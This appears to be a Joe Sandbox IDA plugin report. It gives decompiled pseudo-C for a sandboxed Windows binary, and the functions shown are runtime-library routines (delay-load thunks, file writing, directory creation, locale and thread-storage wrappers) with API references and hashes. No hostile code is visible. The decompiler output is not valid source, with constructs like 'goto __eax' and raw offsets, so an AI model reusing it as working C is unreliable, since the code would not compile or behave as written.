                • Opcode Fuzzy Hash: b1bde1085845b8b5437c4c9e13d87ae2c3ad292bcaacbbca399194f0f4bcabf1
                • Instruction Fuzzy Hash: 4F012BB6340349ABD3315F25AC52BB67758EB84751F20012FF746562C0CAB06C848228
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE528() {
                
                				E003EE85D(0x40c66c, 0x433084); // executed
                				goto __eax;
                			}




                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE51F
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: (>$2>
                • API String ID: 1269201914-613093996
                • Opcode ID: 5f6a1784af021f410e84154a2c3123251eb9bdba7eaaa9afeb50b09a3e45285f
                • Instruction ID: 16498d57af3990d6762f7f07ad20e9a9375c1d1558644f362c86e96dfa08e66b
                • Opcode Fuzzy Hash: 5f6a1784af021f410e84154a2c3123251eb9bdba7eaaa9afeb50b09a3e45285f
                • Instruction Fuzzy Hash: EEB012C52584D0BC7109521A1D02D3B051CC0C6F11730D73FF414C84C0E9454C450435
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E003D9F7A() {
                				void* __ecx;
                				void* __ebp;
                				long _t37;
                				void* _t42;
                				void* _t46;
                				signed int _t49;
                				intOrPtr* _t53;
                				void** _t54;
                				DWORD* _t61;
                				void* _t65;
                				intOrPtr _t66;
                				long _t67;
                				intOrPtr* _t69;
                				void* _t70;
                
                				_t67 =  *(_t70 + 0x18);
                				_t69 = _t53;
                				if(_t67 != 0) {
                					_t54 = _t69 + 8;
                					 *(_t70 + 0xc) = _t54;
                					if( *((intOrPtr*)(_t69 + 0x10)) != 1) {
                						 *(_t70 + 0xc) = _t54;
                					} else {
                						_t46 = GetStdHandle(0xfffffff5);
                						_t54 = _t69 + 8;
                						 *_t54 = _t46;
                					}
                					while(1) {
                						 *(_t70 + 0x10) =  *(_t70 + 0x10) & 0x00000000;
                						_t49 = 0;
                						if( *((intOrPtr*)(_t69 + 0x10)) == 0) {
                							goto L13;
                						}
                						_t65 = 0;
                						if(_t67 == 0) {
                							L15:
                							if( *((char*)(_t69 + 0x1e)) == 0 ||  *((intOrPtr*)(_t69 + 0x10)) != 0) {
                								L22:
                								 *((char*)(_t69 + 0xc)) = 1;
                								return _t49;
                							} else {
                								_t64 = _t69 + 0x32;
                								if(E003D6BAA(0x411098, _t69 + 0x32, 0) == 0) {
                									E003D6E98(0x411098, _t69, 0, _t64);
                									goto L22;
                								}
                								_t54 =  *(_t70 + 0x14);
                								if( *(_t70 + 0x10) < _t67 &&  *(_t70 + 0x10) > 0) {
                									_t66 =  *_t69;
                									 *0x403278(0);
                									_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t66 + 0x14))))();
                									asm("sbb edx, 0x0");
                									 *0x403278(_t42 -  *(_t70 + 0x14), _t61);
                									 *((intOrPtr*)(_t66 + 0x10))();
                									_t67 =  *(_t70 + 0x20);
                									_t54 =  *(_t70 + 0x14);
                								}
                								continue;
                							}
                						} else {
                							goto L8;
                						}
                						while(1) {
                							L8:
                							_t37 = _t67 - _t65;
                							if(_t37 >= 0x4000) {
                								_t37 = 0x4000;
                							}
                							_t61 = _t70 + 0x14;
                							_t13 = WriteFile( *_t54,  *(_t70 + 0x28) + _t65, _t37, _t61, 0) == 1;
                							_t49 = _t49 & 0xffffff00 | _t13;
                							if(_t13 != 0) {
                								break;
                							}
                							_t54 =  *(_t70 + 0x14);
                							_t65 = _t65 + 0x4000;
                							if(_t65 < _t67) {
                								continue;
                							}
                							break;
                						}
                						L14:
                						if(_t49 != 0) {
                							goto L22;
                						}
                						goto L15;
                						L13:
                						WriteFile( *_t54,  *(_t70 + 0x28), _t67, _t70 + 0x14, 0);
                						asm("sbb bl, bl");
                						_t49 = 1;
                						goto L14;
                					}
                				}
                				return 1;
                			}


















                APIs
                • GetStdHandle.KERNEL32(000000F5,?,?,?,?,003DD343,00000001,?,?,?,00000000,003E551D,?,?,?), ref: 003D9F9E
                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,003E551D,?,?,?,?,?,003E4FC7,?), ref: 003D9FE5
                • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,003DD343,00000001,?,?), ref: 003DA011
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: FileWrite$Handle
                • String ID:
                • API String ID: 4209713984-0
                • Opcode ID: b19bc1927b7bc85cfeadf132d5774ead1a2518f2c3d5eea309c3b0f1038d4698
                • Instruction ID: b6c7ce43a67863fc24b4584f9ccfa11a49f22fefa5ad8aff520b394e28235054
                • Opcode Fuzzy Hash: b19bc1927b7bc85cfeadf132d5774ead1a2518f2c3d5eea309c3b0f1038d4698
                • Instruction Fuzzy Hash: 98318072244305AFDB16CF20E918B6A7BA9FB84716F04451EF581AB390C7759D48CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003DA2B2(void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
                				short _v4100;
                				signed int _t11;
                				void* _t14;
                				void* _t17;
                				int _t24;
                				long _t25;
                				WCHAR* _t26;
                				void* _t27;
                
                				_t27 = __eflags;
                				E003EEC50(0x1000);
                				_t26 = _a4;
                				_t11 =  *(E003DC27E(_t27, _t26)) & 0x0000ffff;
                				if(_t11 != 0x2e && _t11 != 0x20) {
                					_t24 = CreateDirectoryW(_t26, 0); // executed
                					if(_t24 != 0) {
                						L6:
                						if(_a8 != 0) {
                							E003DA4ED(_t26, _a12); // executed
                						}
                						return 0;
                					}
                				}
                				if(E003DA231(_t26) == 0 && E003DBB03(_t26,  &_v4100, 0x800) != 0 && CreateDirectoryW( &_v4100, 0) != 0) {
                					goto L6;
                				}
                				_t25 = GetLastError();
                				_t14 = 2;
                				__eflags = _t25 - _t14;
                				if(_t25 != _t14) {
                					__eflags = _t25 - 3;
                					_t17 = (0 | _t25 == 0x00000003) + 1;
                					__eflags = _t17;
                					return _t17;
                				}
                				return _t14;
                			}












                APIs
                  • Part of subcall function 003DC27E: _wcslen.LIBCMT ref: 003DC284
                • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,003DA175,?,00000001,00000000,?,?), ref: 003DA2D9
                • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,003DA175,?,00000001,00000000,?,?), ref: 003DA30C
                • GetLastError.KERNEL32(?,?,?,?,003DA175,?,00000001,00000000,?,?), ref: 003DA329
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: CreateDirectory$ErrorLast_wcslen
                • String ID:
                • API String ID: 2260680371-0
                • Opcode ID: af86adb9bfeedb4ba0708669bce5dba7d17a71f3aefff89ca7460192eed913be
                • Instruction ID: 4f5d5d7132205b8bf8dc96a06e968d89f4d2d758c7912be797702652dc084a5d
                • Opcode Fuzzy Hash: af86adb9bfeedb4ba0708669bce5dba7d17a71f3aefff89ca7460192eed913be
                • Instruction Fuzzy Hash: F501B537500A106AEF23AF756E09BED365D9F0A781F044417F901E62C5D764CB81C6B6
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
                			E003FB893(void* __edx, intOrPtr _a4) {
                				signed int _v8;
                				char _v264;
                				char _v520;
                				char _v776;
                				char _v1800;
                				char _v1814;
                				struct _cpinfo _v1820;
                				intOrPtr _v1824;
                				signed char _v1828;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t63;
                				void* _t67;
                				signed char _t68;
                				intOrPtr _t69;
                				void* _t72;
                				char _t73;
                				char _t74;
                				signed char _t75;
                				signed int _t76;
                				signed char _t87;
                				signed int _t90;
                				signed int _t91;
                				signed int _t93;
                				char* _t94;
                				intOrPtr _t96;
                				signed int _t97;
                
                				_t63 =  *0x40e7ac; // 0xc24f6281
                				_v8 = _t63 ^ _t97;
                				_t96 = _a4;
                				_t4 = _t96 + 4; // 0x5efc4d8b
                				if(GetCPInfo( *_t4,  &_v1820) == 0) {
                					_t47 = _t96 + 0x119; // 0x3fbee6
                					_t93 = _t47;
                					_t87 = 0;
                					_t67 = 0xffffff9f;
                					_t68 = _t67 - _t93;
                					__eflags = _t68;
                					_v1828 = _t68;
                					do {
                						_t94 = _t93 + _t87;
                						_t69 = _t68 + _t94;
                						_v1824 = _t69;
                						__eflags = _t69 + 0x20 - 0x19;
                						if(_t69 + 0x20 > 0x19) {
                							__eflags = _v1824 - 0x19;
                							if(_v1824 > 0x19) {
                								 *_t94 = 0;
                							} else {
                								_t72 = _t96 + _t87;
                								_t57 = _t72 + 0x19;
                								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
                								__eflags =  *_t57;
                								_t59 = _t87 - 0x20; // -32
                								_t73 = _t59;
                								goto L24;
                							}
                						} else {
                							 *(_t96 + _t87 + 0x19) =  *(_t96 + _t87 + 0x19) | 0x00000010;
                							_t54 = _t87 + 0x20; // 0x20
                							_t73 = _t54;
                							L24:
                							 *_t94 = _t73;
                						}
                						_t68 = _v1828;
                						_t61 = _t96 + 0x119; // 0x3fbee6
                						_t93 = _t61;
                						_t87 = _t87 + 1;
                						__eflags = _t87 - 0x100;
                					} while (_t87 < 0x100);
                				} else {
                					_t74 = 0;
                					do {
                						 *((char*)(_t97 + _t74 - 0x104)) = _t74;
                						_t74 = _t74 + 1;
                					} while (_t74 < 0x100);
                					_t75 = _v1814;
                					_t90 =  &_v1814;
                					_v264 = 0x20;
                					while(1) {
                						_t103 = _t75;
                						if(_t75 == 0) {
                							break;
                						}
                						_t93 =  *(_t90 + 1) & 0x000000ff;
                						_t76 = _t75 & 0x000000ff;
                						while(1) {
                							__eflags = _t76 - _t93;
                							if(_t76 > _t93) {
                								break;
                							}
                							__eflags = _t76 - 0x100;
                							if(_t76 < 0x100) {
                								 *((char*)(_t97 + _t76 - 0x104)) = 0x20;
                								_t76 = _t76 + 1;
                								__eflags = _t76;
                								continue;
                							}
                							break;
                						}
                						_t90 = _t90 + 2;
                						__eflags = _t90;
                						_t75 =  *_t90;
                					}
                					_t13 = _t96 + 4; // 0x5efc4d8b
                					E003FC988(_t93, _t103, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
                					_t16 = _t96 + 4; // 0x5efc4d8b
                					_t19 = _t96 + 0x21c; // 0xdb855708
                					E003FAB78(0, _t103, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
                					_t21 = _t96 + 4; // 0x5efc4d8b
                					_t23 = _t96 + 0x21c; // 0xdb855708
                					E003FAB78(0, _t103, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
                					_t91 = 0;
                					do {
                						_t68 =  *(_t97 + _t91 * 2 - 0x704) & 0x0000ffff;
                						if((_t68 & 0x00000001) == 0) {
                							__eflags = _t68 & 0x00000002;
                							if((_t68 & 0x00000002) == 0) {
                								 *(_t96 + _t91 + 0x119) = 0;
                							} else {
                								_t37 = _t96 + _t91 + 0x19;
                								 *_t37 =  *(_t96 + _t91 + 0x19) | 0x00000020;
                								__eflags =  *_t37;
                								_t68 =  *((intOrPtr*)(_t97 + _t91 - 0x304));
                								goto L15;
                							}
                						} else {
                							 *(_t96 + _t91 + 0x19) =  *(_t96 + _t91 + 0x19) | 0x00000010;
                							_t68 =  *((intOrPtr*)(_t97 + _t91 - 0x204));
                							L15:
                							 *(_t96 + _t91 + 0x119) = _t68;
                						}
                						_t91 = _t91 + 1;
                					} while (_t91 < 0x100);
                				}
                				return E003EFBBC(_t68, 0, _v8 ^ _t97, _t93, 0x100, _t96);
                			}
































                APIs
                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 003FB8B8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Info
                • String ID:
                • API String ID: 1807457897-3916222277
                • Opcode ID: 7ac2b4826e32fde9df46f3e28a3dd78172fb583954a8e9a2ac0027aa4898b9be
                • Instruction ID: 37c1da35b3877d8c5e05a96e81e43ce84f239086b31d65414b03b0b92805d14f
                • Opcode Fuzzy Hash: 7ac2b4826e32fde9df46f3e28a3dd78172fb583954a8e9a2ac0027aa4898b9be
                • Instruction Fuzzy Hash: C741D5B050428C9EDF238E69CC84BF6FBADEB55304F1404EDE79AC6142D375AA459F60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 35%
                			E003FAF6C(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                				signed int _v8;
                				void* __esi;
                				signed int _t18;
                				intOrPtr* _t20;
                				int _t22;
                				void* _t30;
                				intOrPtr* _t33;
                				void* _t34;
                				signed int _t35;
                
                				_t31 = __edi;
                				_t26 = __ecx;
                				_t25 = __ebx;
                				_push(__ecx);
                				_t18 =  *0x40e7ac; // 0xc24f6281
                				_v8 = _t18 ^ _t35;
                				_t20 = E003FAC98(0x16, "LCMapStringEx", 0x4079c4, "LCMapStringEx"); // executed
                				_t33 = _t20;
                				if(_t33 == 0) {
                					_t22 = LCMapStringW(E003FAFF4(__ebx, _t26, _t30, __edi, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
                				} else {
                					 *0x403278(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
                					_t22 =  *_t33();
                				}
                				_pop(_t34);
                				return E003EFBBC(_t22, _t25, _v8 ^ _t35, _t30, _t31, _t34);
                			}












                APIs
                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 003FAFDD
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: String
                • String ID: LCMapStringEx
                • API String ID: 2568140703-3893581201
                • Opcode ID: 23d4b5add5930630c5e8087e2518419ed69ad6d9893d00394545a586de65465f
                • Instruction ID: ebfd317954346581ec79e7820e585328081749a1d7a319ff155d7ffa5142ca7a
                • Opcode Fuzzy Hash: 23d4b5add5930630c5e8087e2518419ed69ad6d9893d00394545a586de65465f
                • Instruction Fuzzy Hash: E40148B250420DBBCF029F90DC06DEE7F66EF08750F014265FE186A1A0CA369A31EB95
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 21%
                			E003FAF0A(void* __ebx, void* __ecx, void* __edi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
                				signed int _v8;
                				void* __esi;
                				signed int _t8;
                				intOrPtr* _t10;
                				int _t11;
                				void* _t14;
                				void* _t19;
                				void* _t20;
                				intOrPtr* _t22;
                				void* _t23;
                				signed int _t24;
                
                				_t20 = __edi;
                				_t14 = __ebx;
                				_push(__ecx);
                				_t8 =  *0x40e7ac; // 0xc24f6281
                				_v8 = _t8 ^ _t24;
                				_t10 = E003FAC98(0x14, "InitializeCriticalSectionEx", 0x4079a0, "InitializeCriticalSectionEx"); // executed
                				_t22 = _t10;
                				if(_t22 == 0) {
                					_t11 = InitializeCriticalSectionAndSpinCount(_a4, _a8);
                				} else {
                					 *0x403278(_a4, _a8, _a12);
                					_t11 =  *_t22();
                				}
                				_pop(_t23);
                				return E003EFBBC(_t11, _t14, _v8 ^ _t24, _t19, _t20, _t23);
                			}















                APIs
                • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,003FA56F), ref: 003FAF55
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: CountCriticalInitializeSectionSpin
                • String ID: InitializeCriticalSectionEx
                • API String ID: 2593887523-3084827643
                • Opcode ID: e6451ec29b6a8229d6af54932038bfb84a80393ccce66d7f168b999eea609c3f
                • Instruction ID: e34b5b0c9c8076a00dfec513009a4e87eb83c6a0d14c2f40c4826497c6dc84fd
                • Opcode Fuzzy Hash: e6451ec29b6a8229d6af54932038bfb84a80393ccce66d7f168b999eea609c3f
                • Instruction Fuzzy Hash: CCF0B4B1A4521CBFCB025F51CC06DAEBF65EF08711B404175FD08AA2A0DA755A10A7DA
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 19%
                			E003FADAF(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
                				signed int _v8;
                				void* __esi;
                				signed int _t4;
                				intOrPtr* _t6;
                				long _t7;
                				void* _t10;
                				void* _t15;
                				void* _t16;
                				intOrPtr* _t18;
                				void* _t19;
                				signed int _t20;
                
                				_t16 = __edi;
                				_t10 = __ebx;
                				_push(__ecx);
                				_t4 =  *0x40e7ac; // 0xc24f6281
                				_v8 = _t4 ^ _t20;
                				_t6 = E003FAC98(3, "FlsAlloc", 0x407938, "FlsAlloc"); // executed
                				_t18 = _t6;
                				if(_t18 == 0) {
                					_t7 = TlsAlloc();
                				} else {
                					 *0x403278(_a4);
                					_t7 =  *_t18();
                				}
                				_pop(_t19);
                				return E003EFBBC(_t7, _t10, _v8 ^ _t20, _t15, _t16, _t19);
                			}















                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Alloc
                • String ID: FlsAlloc
                • API String ID: 2773662609-671089009
                • Opcode ID: 54afc82cf18fce503001da5e954d99ae7572c2c8c509071523577d05a13c0ea7
                • Instruction ID: 697c7a1d42a7d32f78585e99fcaba5fcc8b62ede434e2101d82fcc431042ae72
                • Opcode Fuzzy Hash: 54afc82cf18fce503001da5e954d99ae7572c2c8c509071523577d05a13c0ea7
                • Instruction Fuzzy Hash: B0E05CB0A8421C7BD2025B15CC12E3DBB54CB04721B0101B9F904B7280CD746E0042CE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE1F6() {
                
                				E003EE85D(0x40c5ec, 0x43315c); // executed
                				goto __eax;
                			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: dae80692cc746785ffac520206e3dd2a226e9f972815d997515978345ac3dc02
                • Instruction ID: d1fb35a7e10625ad54f2410563d26bed7546e69a05d6a1eeb1cc0730144d7e92
                • Opcode Fuzzy Hash: dae80692cc746785ffac520206e3dd2a226e9f972815d997515978345ac3dc02
                • Instruction Fuzzy Hash: 31B012D52580A0FC350957475C02D37010CC0C5F12330C33FFC15C45C0E954AC4C0835
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE1EC() {
                
                				E003EE85D(0x40c5ec, 0x433160); // executed
                				goto __eax;
                			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: 75be9a6e4201657764d1d6afb4c53117c4614afeb42138239cf4c171a3563edb
                • Instruction ID: 24c5139fe448e7ae25872ba6da9abb7bd76987f720d2954408d1431511266958
                • Opcode Fuzzy Hash: 75be9a6e4201657764d1d6afb4c53117c4614afeb42138239cf4c171a3563edb
                • Instruction Fuzzy Hash: 9CB012D925C1A0FC3509528B5C42D37010CC0C4F12330833FFC15C44C0EA586C440535
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE1D1() {
                
                				E003EE85D(0x40c5ec, 0x43316c); // executed
                				goto __eax;
                			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: >
                • API String ID: 1269201914-1552337569
                • Opcode ID: b3c8016753bf7143c3f8b9c84aca72c30135712bb07451b5b59a4b9b95456a0b
                • Instruction ID: e0d5f884435e5cc6cda0594c0ce72ca9928ac1ee04a17d018cc074692b473a8c
                • Opcode Fuzzy Hash: b3c8016753bf7143c3f8b9c84aca72c30135712bb07451b5b59a4b9b95456a0b
                • Instruction Fuzzy Hash: 42B012D92581A0FC350912875C52C37010CC0C5F12330C73FFC11D48C0E954AC440435
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EE23C() {
                
                				E003EE85D(0x40c5ec, 0x433140); // executed
                				goto __eax;
                			}



                0x003ee1e3
                0x003ee1ea

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE1E3
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
